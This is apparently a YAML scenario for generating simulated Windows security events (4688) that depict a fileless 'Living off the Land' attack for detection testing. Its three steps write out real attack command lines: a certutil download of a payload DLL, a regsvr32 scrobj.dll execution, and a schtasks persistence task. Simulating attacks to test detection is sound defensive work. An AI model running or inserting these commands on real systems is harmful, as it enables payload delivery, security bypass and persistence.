name: "Living off the Land (LotL) / Fileless Malware"
description: "Симуляция использования легитимных системных утилит (certutil, regsvr32) для обхода средств защиты."
global_context:
  host.name: "SERVER-1C"
  host.domain: "{env.domain}"
  user.name: "1c_admin"

steps:
  - id: "step_1_certutil_download"
    template: "win_security_4688"
    description: "Использование certutil для скачивания вредоносного пейлоада (обход сетевых фильтров)."
    delay_from_prev: "0s"
    fields:
      host_name: "SERVER-1C"
      host_ip: "192.168.100.7"
      user_name: "1c_admin"
      process_name: "certutil.exe"
      process_path: "C:\\Windows\\System32\\certutil.exe"
      parent_name: "cmd.exe"
      parent_path: "C:\\Windows\\System32\\cmd.exe"
      process_command_line: "certutil.exe -urlcache -split -f http://192.168.100.254/payload.dll C:\\Windows\\Temp\\payload.dll"
      mitre_technique: "T1105"
      mitre_tactic: "Command and Control"

  - id: "step_2_regsvr32_execution"
    template: "win_security_4688"
    description: "Выполнение вредоносной DLL через легитимный бинарник regsvr32 (обход Application Whitelisting)."
    delay_from_prev: "10s"
    depends_on: "step_1_certutil_download"
    fields:
      host_name: "SERVER-1C"
      host_ip: "192.168.100.7"
      user_name: "1c_admin"
      process_name: "regsvr32.exe"
      process_path: "C:\\Windows\\System32\\regsvr32.exe"
      parent_name: "cmd.exe"
      parent_path: "C:\\Windows\\System32\\cmd.exe"
      process_command_line: "regsvr32.exe /s /u /i:C:\\Windows\\Temp\\payload.dll scrobj.dll"
      mitre_technique: "T1218.010"
      mitre_tactic: "Defense Evasion"

  - id: "step_3_schtasks_persistence"
    template: "win_security_4688"
    description: "Создание задачи в планировщике для закрепления в системе."
    delay_from_prev: "2m"
    depends_on: "step_2_regsvr32_execution"
    fields:
      host_name: "SERVER-1C"
      host_ip: "192.168.100.7"
      user_name: "1c_admin"
      process_name: "schtasks.exe"
      process_path: "C:\\Windows\\System32\\schtasks.exe"
      parent_name: "cmd.exe"
      parent_path: "C:\\Windows\\System32\\cmd.exe"
      process_command_line: "schtasks.exe /create /tn \"SystemUpdater\" /tr \"regsvr32.exe /s /u /i:C:\\Windows\\Temp\\payload.dll scrobj.dll\" /sc minute /mo 5"
      mitre_technique: "T1053.005"
      mitre_tactic: "Persistence"
